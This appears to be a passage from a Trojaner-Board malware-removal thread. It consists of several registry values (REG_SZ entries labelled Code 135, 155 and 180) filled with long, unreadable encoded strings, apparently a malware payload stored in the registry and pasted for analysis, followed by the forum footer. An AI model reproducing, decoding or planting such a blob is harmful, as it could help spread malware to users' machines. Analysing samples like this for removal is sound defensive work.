vviivvtqtrvvttvvtyvviuvviyvvtyvvtrvvtqtuvvitvvtpvvtqtwvviivvttvvtuvviivvtivvtyvviyvvtsvvirvvitvvtsvvtrvvtuvvitvvtrvviwvvtqtpvvtivvtovvtwvvtyvvtovviwvvtsvvitvvtovvtwvvtsvvtuvvtsvvtovvtovvtuvvtivviivvtpvvtsvviwvvtwvvtsvvtuvvtqtqtuvvtsvvttvvtivvirvvtivvitvvtivviuvvtpvvtqtwvvtwvviyvvtwvvitvvtrvvtqtovviwvvtpvviuvvtqtrvvtwvviwvvtpvvtrvviwvvtsvviyvvtuvvttvvirvviivviuvvtsvvttvvtpvvirvvtsvvttvvtqtyvvtqtuvvtpvvtivvtwvvtpvvirvviivvtqtuvviuvvtuvvtuvviuvviuvvttvvtyvvtuvvirvvitvviyvviwvvtyvvtwvvttvvtovvtrvvtpvviivviuvvitvvtuvvitvvitvvtsvvtqttvviyvviivviyvvtwvvttvvttvvtivvtwvvitvviyvviwvvtuvvirvvtuvviwvvtrvvttvviwvvirvvirvvttvviuvviwvvttvviyvvtovvtuvvtuvvtpvvtrvvtsvvtyvviivviuvvtqtwvvttvviwvvtyvvitvvtpvvtrvviyvvtsvvtovvtuvvtpvviuvviwvviyvvttvvtpvvtsvvtyvvirvvtrvviivvtyvvtuvvtuvvttvvtqtwvvtrvvtovvtpvvtivvtrvvtivvtqtwvvitvvtuvvtyvvtqtsvviwvvitvvtuvviyvvtpvvttvvttvvttvviuvvtwvvitvvtpvviuvvtivvitvvtrvvtivviwvvtyvvtovvtpvvtwvvtqtpvvttvvtwvviyvvttvviyvviyvviivvtovviyvviyvvtovviwvvtrvvtwvviuvvtpvvttvvttvvtrvvtuvvirvvtivvtqtovvtovvitvviuvviuvviuvvtovviuvviyvviwvvtpvviuvviivvtwvvirvvitvvtivvtovvtovvtqtqtwvvtqtivvtrvviuvvttvvtovvtivvirvvtyvvtivviyvvirvviyvvtrvviuvvtsvvtrvviivviuvviuvvirvvirvvtyvvttvviyvvttvviyvvtwvviyvvirvvtyvvtyvvtrvvtyvviuvvtuvvtpvvtuvvtpvvttvvtqtrvviuvviwvviuvviivvttvvtyvvttvvitvvtwvvitvvitvvtwvviyvvtyvvttvviuvviivvtuvvtovvtwvvtsvvtqtpvvtwvviivvttvvtrvviuvvitvvirvvttvvtivviivviivvtuvvtqtyvviyvvtwvviyvviuvvtwvviwvv |
Code: 135 REG_SZ vvtsvvirvvtwvviyvvirvvtpvviwvvtqitvvtqiuvvtpvvtovvtpvvtrvviyvvtwvviuvvirvvtwvviuvvtqiivvtqtqiivviwvvtwvvtwvvtqtsvvtwvvtwvvtrvvtqitvvtrvviivvtsvvirvvtivvtsvvtivvttvviuvvttvviwvviuvvtivvitvviuvvtwvvtpvvtqtrvvtivviwvviuvvttvvtivvtrvvtqtpvvtovvitvvtpvvttvvitvvttvviwvviyvvtsvvttvvtuvvtovvtovvttvvtwvvtqiyvvttvvtuvvttvvtivvtsvvtyvviwvvtwvvtqttvvtuvvtyvviivvtwvvtpvvttvvtqtwvvtyvvitvvirvvtivvtovvitvvttvvtpvvtrvvtsvvirvvtyvvtpvvtyvvtivvtsvvtqtsvviwvvtyvviwvvirvvtuvvtrvvtovviivvirvvtsvviwvvtovvtqtivvtuvvitvvtwvviyvvirvvirvvttvvtuvvtqtrvvttvviwvvtwvviivviivvitvvtyvvtyvvttvviivviuvvtovvtqtovvtqtuvvtrvvtwvvtsvvtwvvtyvvtwvvitvviwvvtivviyvvttvvtpvviivvtsvvtovvtpvvtyvvitvvirvviwvvtwvvitvvtqttvvitvvtuvvtivviuvvitvviuvvttvvirvviivvirvviuvvtivvtyvvtovvtivvirvvtpvviuvvtsvvtuvviyvvtovviivvirvvttvvtivvtovvtivvtpvvirvvtovvtivvtpvvtivvtqtqtovviwvvtovviwvvtsvvtovviyvvtivviuvvtpvviuvviuvvtpvvtuvvtwvvtwvvtqtqtsvvtivviuvvtwvviyvvtwvvirvvirvviyvviivvtqiuvvtovvtpvvtuvvtovvtuvviwvviwvvttvvtsvvtovvtpvvirvvtqiwvvtsvvtqttvvttvvtovvtuvvttvvirvvtwvvtwvvtqtovvirvvitvvtwvvtuvvtsvviuvvtyvviuvvtuvvitvviivviuvvirvviivvtrvvtyvvtqtqtivvtqtrvviwvviuvvtwvviivvtsvvtsvvtsvvitvvtpvviuvvtwvvtwvvtovvtsvvttvvtwvvtsvvtwvviuvvtsvvtwvviyvvirvvtovviivvirvvtivvtpvvtqtrvvtrvvtwvvtsvvtsvvtovvtrvviivvtpvvtsvviwvviyvvirvvitvvtwvviivvtqtsvvirvviuvvtpvvtivvttvviyvvtivvtwvvtsvvitvvtpvvttvvttvviuvvttvvtwvvtwvvtqtovviuvviwvvttvvirvvtuvvtyvvtsvvtrvvtsvviwvvtivvtpvvttvvitvvtqiwvvirvviwvvtwvvirvviyvvitvvtwvvtyvvtuvvtyvvttvvtovviwvviivvtsvviwvvitvvtwvviyvviivvtpvvtuvvtivvtqttvvtuvviivvtrvviuvviyvviuvviivviwvviyvvirvvitvviivvtovviuvvtrvvtsvvtwvvttvvtqtwvvtrvvtivvitvvtwvviuvviivvtuvvitvvitvvttvvitvvtsvvtivviuvvtwvvtivvtwvviuvvtuvvtrvvtsvvtwvvtivvttvvttvviyvvtwvvtrvvtuvvtrvvitvviwvviyvvtwvvtuvvtpvvtsvvtovvtovvtwvviyvvtpvviivvtivvtrvviuvviivvtuvvtpvvtivvtwvvitvvtpvviwvviuvvtpvvtsvviuvviwvvtsvviuvviwvvtyvviuvviyvvtivvtqiivvtsvvirvvtuvvtsvviyvvtivvtuvviwvviwvviwvvtivviyvvtrvvtpvviivvtivvitvvtuvvtyvvttvvtqtyvvtwvviivvirvvtqtpvvitvvttvvtpvviwvviwvvtqttvviwvviivvtyvvtpvvtwvvtovvirvvtuvvttvvtrvvitvviyvvttvvtyvvtrvvitvviivviwvvtyvvtpvvttvvtwvvtwvvitvvtivvtpvvtyvviivvtsvviwvvttvvtuvvtovviuvvtsvvtivvtyvvirvviivvitvvtpvvtivvtwvvtsvvtovvtovviuvviwvviwvviwvviuvvtovvtyvvtrvvtsvvttvvtovvtqtyvvitvvitvvtovvtovvtpvviyvvtsvvtrvvtpvviivvitvvtovviivvtpvvitvvttvviyvviyvvtyvviwvvtovvtpvvtrvvtyvvtyvvtyvvtovvirvvitvvtovviwvvtsvvtqtpvviuvviyvvtqtpvvtsvvtovvtivvtpvviyvvtwvvtuvvtpvvtovvtuvviivviivvitvvitvvtpvvtuvvtivviuvviyvvttvvtovvtovvtuvvtivviwvvtyvvttvvirvvitvviyvvtivvitvviyvviyvviivvtsvviuvvtqtivvtivvtsvvtwvvtovvtivvtrvvtwvvtqtwvviwvviivviivvtivvtqtuvvtyvvtrvvtrvvtqiyvviyvvtqtpvviuvvtsvvitvviuvvirvviuvvtivvtsvvirvviyvvtivviyvvtsvvtrvvtpvviwvvtuvviivvtrvvtyvvirvvtpvvtyvvtwvvtovvtrvvtpvvtrvvtpvvirvviyvvtyvvtivvitvvtqtrvvirvvttvvirvvtpvvtwvvtovvtrvvtuvvtuvvitvvirvvtovvtpvviyvvirvviuvvttvvtqiivviuvvitvvirvvtrvvtivvtivviyvvtivvitvviyvvtuvvitvvirvviivvitvvtqtuvvtqiwvvirvviwvvtqtpvvtwvvitvvtwvvtpvvtpvvtwvvtyvviivvtyvviivvtsvvtsvviuvvtqtuvvtsvvtsvviivvtqtyvviuvvtrvvttvvttvviuvviwvvtwvvtivviivviwvvtuvvtuvviivvtovvtuvvtrvvtovviyvvtovvtovvtyvviyvvtivvtrvvttvvtpvvtivvtwvvirvvtrvviwvvirvviivvtpvviyvvtyvvitvvtyvvitvvtrvvtwvvtwvviyvviivvtqtuvviivvttvviyvvtovviwvvtpvvtpvvtivviuvvtqiivviivviyvvirvviuvvtrvviwvvtivvtyvvtrvvtyvvtsvvirvvirvviuvvitvvtqtovvtrvvitvvtwvvirvviwvviwvvtpvvtyvvttvviuvvtwvvtovvtyvviuvvttvvtovvtrvvtqtqtsvvtwvvtqttvvtsvvtwvviivvtrvviwvvtsvvtqtyvvtsvvttvvtivvtqtsvvtrvvitvvtuvvtsvvtwvvtivvirvviwvvtwvviuvvtwvvtrvvtpvvitvviivviwvvtuvvitvviwvvtovvtyvvtuvvttvvtwvvtpvviwvvtrvvtqttvvtuvvitvvtsvvtuvviwvviuvviwvvtuvviyvvttvviuvvtuvvitvvitvvitvvirvvtpvvtqiyvvtwvviwvviivvtovvttvviyvvtqitvviyvvitvvitvviwvviivvtrvvtwvviwvviivvtuvvtqtqiwvvttvvtqtrvvttvviwvvitvvtovvtsvvtsvvtivviuvvttvviwvvirvvitvvttvviivvtrvviwvvttvvirvvtuvvtivviwvvirvvitvvitvvtwvvtpvvtsvviuvvtpvvtqirvviuvvtwvviyvviyvvtwvvitvvtqitvvirvvttvviivvtovviyvviyvvitvvttvvtrvvitvvtovvtrvvtuvviwvvtqtrvvitvvtuvvtuvvtyvvtrvvtovvtyvvtovvtqirvvtuvvitvviyvviyvvtovvtyvvtsvvirvvtrvvit |
Code: 155 REG_SZ vvtyvvtwvvtrvvirvvitvvtovvtrvviuvvtovvtuvviivvitvvirvvitvvirvviivviwvviuvvttvviuvvtwvvtivvtsvvtwvvtqiwvvtpvvtsvvtivvtovviwvvtwvvitvvtuvvtpvvtivviyvvirvviuvvttvviuvvtrvvitvviyvvtivvtuvvtivviivviuvvtovvitvvtpvvirvvttvvirvvtuvviwvvtuvvtwvvtqtsvvtivvtovvtpvvtqitvvtrvvtwvvtuvvtyvviuvvtwvvtovvtivvtsvvtovvtivvtwvvtqtsvvtqtovvirvvttvvtwvvtpvvtrvvtwvvitvvtrvvitvviuvvtsvvtuvviivvirvviuvvttvvtqtrvvtovvtqttvvtwvvtsvvtrvvtqiivvtivvttvvtyvvtpvvtivvtyvvtqtrvvtsvvitvviuvvtrvviyvvtrvvtivvtivvtivvtovvtivviuvvttvviivviyvviyvvtovvtwvviuvvirvvtuvviuvviwvvtivvtovvttvviyvvitvvirvvtuvvtovvtqiyvvttvvtovviivviyvvtwvvtovvtsvvtyvvtovvtsvvtyvvtqtuvvtivvtyvviyvvtrvvtivvtwvvtqiwvvtuvvtqtqiuvvtpvviwvvtwvvitvviivvtwvviwvviwvvtsvvirvvtpvvtovvirvvtwvvtpvvtovvtuvvtovvttvvtivviivvtrvvtovvtwvviivvtpvvtivvtyvvtyvviyvviuvvtivvitvvtpvvtqtivvtwvviwvvtqtovvtpvvtwvviyvvtivvtivvtsvviyvviwvviwvvttvviuvviwvvttvvtovvtyvvtqiwvvtyvvirvvtqtqiyvvirvviwvvtrvvtsvvtuvviuvviivvtsvvtuvvtsvvtivvirvviwvviuvvirvvtwvvtqtrvviyvvirvvirvviyvvtovvtwvvtpvvtwvvitvvtqiuvvtuvvtivvtsvvirvvitvvttvvtrvvitvviwvvtpvvirvvtyvvtwvviwvviuvvtyvvtqtsvvttvviyvviuvvtqtpvvtuvviyvvtqiwvvtwvvtivvirvvirvvttvvtivvtpvvtuvvitvvtuvviwvviivvtsvvitvvtyvviivvtyvviwvvttvviivviwvvtivvttvvtivvtsvvitvvtpvviivvtyvvtyvvitvviyvvtrvvtsvvtpvvtivviivvtuvvitvvtuvvtyvvttvviwvvtuvvtrvvtuvviwvvtrvvitvviivviivvtuvvtyvvtsvviyvvtsvvtovvtrvvtyvviivvitvvtwvvtovvtivvtivvttvvirvvttvvttvvtqtuvvtpvvtivvtivviuvviwvvtwvvtyvvtuvvtwvvttvvitvvirvvtovvtsvvtrvvtsvvtivvtsvvtuvvtyvvtpvviwvvirvviivvtpvvtrvvtpvviyvvtrvvttvviyvvtwvvitvvtpvvtuvvtyvvitvviivvtqtrvvtpvvtovviyvviivvirvviuvvtwvviyvvirvvttvviyvviuvvitvviuvvtpvviuvviuvviwvvtivvtivvitvvtrvvirvviyvvtovviivvtrvvttvvirvviyvvtrvvtpvvtwvviwvvtrvvttvvitvvtwvvtpvvtivvirvvtrvvtrvvtqtwvviuvvtyvviivvtovvtqitvvtovvtuvvirvviwvviwvvtivvtsvviivvtovviyvvtpvvirvvtsvvtpvviivvitvviyvviivvtrvvtqtpvvirvvtuvviuvvtuvviivviwvvtuvviwvvttvviivviyvvtivvtrvvtuvviivviuvvtsvviuvvtivvtuvvttvvtpvvitvvtivvtrvviivvtuvvttvvtrvvtivvtyvvtrvvtivviwvvtsvvtqitvvtwvvtrvvitvvtsvvitvvtpvvtwvviivviivvtovviuvvttvvttvvtovviivvtuvviyvvtivvtyvvirvvtivviuvvtyvvitvvtyvvtovvtsvviwvvtuvvirvvtqtsvviuvvtqirvviivvttvvitvvtuvvtrvvtwvvirvviyvviuvvtuvvitvvirvviwvvtyvvtyvvtyvvtpvviyvvtwvviyvvitvvtsvviuvvtovvtovvtovvtsvvtwvvtuvvttvviyvvitvvtsvvtsvviuvvtivvtrvvtrvviwvvtpvvtqtivvtovvtpvvirvvttvvtivviuvvtyvvtovvtovvtovvtuvvtpvvtqtovvtuvviwvviuvviwvvirvvtrvviwvvtivvtwvvtuvviuvvitvvtsvvtuvvtrvvitvvtuvvtrvvtrvviivvitvvtqttvvtqtqtuvvttvvtwvviivvirvvtwvvtivvtwvvirvvttvvtwvvtuvvtuvviuvvtqirvvirvvtsvvtyvviuvviwvviuvviivvtqtuvviwvviyvvitvvitvvirvviivvtrvviwvvirvvitvvtsvviuvvtovvtyvviwvviuvviivvtsvvtrvviwvvttvvtsvvtpvvtivviuvviyvvtovvtqtivviwvviuvvtuvvttvviwvvtyvvtqtqtwvvirvvtpvvtrvvtpvvitvvtqtqtovvtivvtrvviyvvtyvviyvvtrvvtivvtrvvtsvvirvviuvvtovvirvviwvvitvvtrvvtrvvtpvviivvtivviivvitvvitvviivvtwvvirvviivvtivviwvvtpvvtsvvtpvvtwvviwvvttvvtsvvtpvviyvvirvviyvviivvtrvvtivvtwvvitvviwvvtwvvtovviuvviivvtrvvitvvttvviwvviivvtwvvtpvviuvvttvvttvvtrvviyvvirvviuvvtpvvttvvtivvtsvvtovviivvtsvvttvvttvvtqtuvvtyvvtyvvirvvttvvtsvvtivvtuvvirvvtovvttvvtyvvtsvvttvvtqttvvtwvvttvvtwvvitvviwvvitvvttvvtuvvtuvvtpvvtsvviwvviivvtovviwvvtivvitvviyvvirvviyvviivvirvvtyvvtpvvttvvtrvviuvvtyvvtyvvtqtsvvirvvtqiivvttvvtrvviuvviwvvtivvtyvvtqiivviwvvtyvvtovviwvvtsvvtrvvirvviivvttvviwvvttvviivviuvvirvvtuvvtpvvitvvtwvvtuvvtivvttvvtivvttvviyvviivvtpvvtovvtivvttvviyvvtovviwvvtuvvtovvirvvitvvtpvvitvvtivvtrvvitvvtivviwvvitvvitvvtovvtyvviwvviuvviyvviivvitvvtrvvtwvvtpvviwvviivvtwvvtyvvtpvviuvvtsvvtqtyvvtwvviyvvtrvvtqiwvvtwvvtqtyvvtyvvtovviivvtrvvtsvvirvvtsvvtivvtivvtsvvirvviivviivvirvvitvviivvirvvtpvvtpvvtqitvvtqiivviwvviivviyvvtyvvtrvvtsvviuvvitvvtovvttvvtqitvvtuvviivvtwvvtqtqtsvvtuvvtovvirvviivvtyvvitvvtuvvtwvvtuvvttvvtivvtwvvtovvtovvtuvvtpvvtpvvtuvvtivvtyvvttvvitvviwvvtovvtuvvtivviuvvitvvitvvitvvirvviwvvtovvtuvvtyvvttvvtovviwvvtpvviyvvtqiwvvitvvtwvvirvvtrvvtyvvtovvtivviuvvirvvtuvvtyvvtrvvtuvviivviwvviivvtqiyvvtyvvtqirvvtsvvtovvtqtivviuvvirvvtsvvirvviwvvtovviwvviivvtyvvtwvvtwvvttvvttvvtivvitvvtyvvirvvttvvtsvv |
Code: 180 REG_SZ vvtuvvtqiyvviwvvtpvvtqitvvtqitvviivvtwvvtuvviwvviivvitvviyvvtivvtovvtuvvtyvviyvvttvvitvvtovvtuvvtuvvtyvvttvviivvirvviwvvtrvvirvvtovvirvvtovvtovviwvvtwvvtyvvtuvvirvviuvvtyvvtpvviyvvirvvtsvvtivvtpvvirvviuvvtovvtovviyvvirvvtuvvirvvirvvtpvviyvvtqitvvtuvvtqiuvvtrvviyvviivvtsvvtpvvtyvvitvviuvvtrvvtwvviyvvtpvvtsvvtqttvvtqirvvtovvtuvvtpvvtuvvttvviwvviwvvtuvvtrvvtovvtovvtyvvtsvviivviivvtsvvtyvvtuvviwvvtyvvtrvviwvvtwvvtqttvvttvvtivvitvviuvviuvvtsvvtuvvtivviivvtivviivvtuvviyvvirvvtovvirvvtsvvtpvvtpvviivviivvtovvitvviyvviwvvtrvvtqtqiuvvitvvttvvtqtyvvtsvvtpvvtrvvtyvviyvviuvvtivvtqtpvvtuvvtqtqiyvvirvvtivvtwvviuvvitvvitvviivvtqiwvviuvviyvvitvviuvviivviwvvtqiuvviwvvtpvvtpvvirvvtqitvvttvvtwvvtuvvtovvtsvviuvvtivvttvviyvvtuvvtyvvtqiuvvtovviwvviyvvtrvvtivvirvvttvvtsvvtwvviyvvtpvviyvvirvviivvtqiyvvttvvtqtrvvtqtuvvirvviyvviwvvitvvtivvtqtwvvtsvvitvvtsvvtpvvtovvtqtrvvtivvtrvvtuvvtpvvtyvvtovvttvvtrvvtpvvtovvtyvviwvviivvtivvtovviuvviivvitvvtpvvtivviyvvtyvvtrvvtqiuvviivviyvvtqitvviivvtrvviwvviuvviivvtsvviuvvtivvtovviuvvtwvviyvvtsvvtovvtrvvtqiuvvirvvtuvviyvvtuvvtivvtyvvttvvtrvviyvvtivvttvvirvvtuvvtivvtwvvtuvvtpvvtwvvtovviyvvtwvvtuvviwvvtovvtivvtivviyvviivvtovvtqtivviyvviwvviwvviivviyvvirvvtqitvviwvviuvvtrvvitvvtwvvtpvvtivvtsvvtwvvtpvvtpvvitvviwvvitvviivvtovviivvitvvtyvvirvviuvvtrvvtsvvtpvvtuvvtovvtwvviwvvtovvttvvtpvvtivviuvvtyvvirvvtyvvtuvvtovvirvvtwvviyvviwvviyvviyvvtpvvitvvtwvvitvviuvvtyvvtqtwvvtuvvtqtsvviuvviivvtqttvvtovvtuvvtrvvtqtivvtqiuvviuvvtuvvttvvtwvviyvviuvviwvviivviyvvtovvtpvvtwvvtpvvttvvttvvtpvvtqtyvvtovvtovviwvvtqtsvviuvvtyvviyvvtpvvtivvtovvtwvvtivvttvvtsvvtovviwvvitvviyvvirvvitvviyvvtovvirvviwvvtivvitvvtqitvviwvvttvvtqtsvvtpvvtyvvtovviwvviwvvttvviivvtivvirvvtovvitvvirvviyvvirvvttvviivviwvvitvvirvvtrvviyvvtsvvtsvviyvviivvtivvtsvvtsvvttvvitvviuvvirvvtivvtovvtwvvtovvtovvttvviivvtuvvirvvtovvtuvvtovvtovvtwvviivviyvvtuvvtivviivvtpvvttvvtpvviivvtpvvtovvirvvtrvviwvvtyvvtqiivviyvviwvvtrvvtpvvitvvtuvviyvvtivvtyvvtqirvvtqiuvvtrvvirvvtivvitvvirvvtivvtqtsvvtwvvtovvitvvtpvviivvtyvvtivvirvvtivviivvirvvtovvtuvvtpvviyvvtuvvitvvtrvviivvttvvtovvitvvtwvvtivviuvvtqtsvvitvviyvvtpvvtivvttvvtwvvtrvviuvvtsvvtuvvtovvttvvtwvviivviyvvtyvviuvvitvviwvviyvvtpvvirvvtqiivvitvvttvvtyvviyvviuvviuvvtwvvtpvvttvvtivvtyvvttvviyvvtqttvvtuvvtuvvtovviuvvtuvvtpvviuvvtivvirvvtuvviyvviwvviuvviuvvttvviivviwvvtuvvtovvtyvviivvtivvtovvtqttvvtyvvtqtsvvtivvtqtyvvtwvvtuvvtovvtovviwvvttvviyvviyvvtpvvtuvvtsvviuvviuvvtsvvtuvvtwvviivvtovvtsvvtovvtqitvvtyvvttvviuvvtuvvtpvvitvvitvvtovvttvvtivvtpvvtqtrvvtovviwvvitvvtovvtovvtpvvtyvviivvttvvirvvtyvviyvviivvtuvvtpvviuvvtuvvirvvtpvvtuvvtqiwvvtovviuvviuvviyvvtsvviyvvtsvvtrvvtqtwvvitvvtpvvtivviyvviuvvirvvtyvvtwvvtwvviivvtivvtivviivvttvvitvvtyvvtrvviyvvtwvvtwvvtuvvtqttvvtrvvtovvtyvvtovvtivvttvvtrvvtpvviyvvttvvtrvvttvvirvvtuvviivvtrvviuvvtqtivvtpvviwvvirvviwvviuvvtqiivvtpvvtyvvitvviyvvirvviyvvtovvtwvvtqtwvvirvvitvvtivvtivvtivviivvtwvvtsvvtpvvtwvviyvvirvviuvvtsvviivvtivvtsvvtrvvtqiwvvirvviuvvtpvvtuvvtovviuvvitvvtqtuvvtqiyvviyvvtivvirvviyvvitvvtqiwvvtivvirvvtrvvirvvtwvviwvvtrvvtuvvtivvttvviyvvtuvvtsvvtyvviyvviuvvtwvvtovviivvtwvvtwvviivviuvvtwvvtuvviyvvtwvvtrvviyvviuvvitvviwvvtrvvtwvvirvviwvvtovviwvvirvviuvvirvviuvvtivviivvtyvvttvvtyvviyvviyvvtovvtpvvtuvvtrvvirvvtrvvtpvvtsvvtovvtovvitvvtwvvtuvvtqiuvvtyvvtsvvirvvtrvvtivvtovviwvvtyvvtpvvtsvviyvviuvviwvvitvviwvviwvviuvvtwvvtuvvitvvtwvviuvviivvtovviuvviwvvtuvvtsvvtrvvitvvitvviwvvirvvtuvviuvvitvvtyvvitvvtqiivvtivvitvvtovvtuvviuvvtovviivviwvvtsvviyvvtqitvvtwvviwvvtuvvtqtivvtuvvitvviyvviwvviwvvitvvirvvttvvtuvvtuvvtpvvtovviwvvtpvvttvvtpvviyvvttvviivvtivvtrvvtrvvtovviivvtuvvitvvtsvvtuvvtivvtrvvirvvtivvtpvvtyvvtpvviwvviyvvirvvitvvirvvtrvviivvtovvirvviyvvtrvvtovvtovvtivviwvvtpvvtovvirvvtivviwvviuvvtqtuvviuvvitvvtrvviuvviuvviwvvtqiyvvtwvviyvviyvviyvvtivvtrvvtuvvtyvvtivvtivvtpvvtuvvtyvvtivvttvviwvviuvvtyvvtrvvtovvtovviyvvtqtyvvtyvvtuvvirvviuvvirvviuvvtsvvtivviivvtuvviuvvtovviuvvtovvtuvvtwvvtqitvvirvvtwvvtuvviivvtyvvtuvviuvvtrvvtovviyvvtuvvttvviuvvtyvvtsvvtovvtrvviwvvttvvtqtsvvirvvtrvviuvvtpvvtyvvtrvvtivvtqirvvtqiuvvtovvtp |
Alle Zeitangaben in WEZ +1. Es ist jetzt 16:56 Uhr. |
Copyright ©2000-2025, Trojaner-Board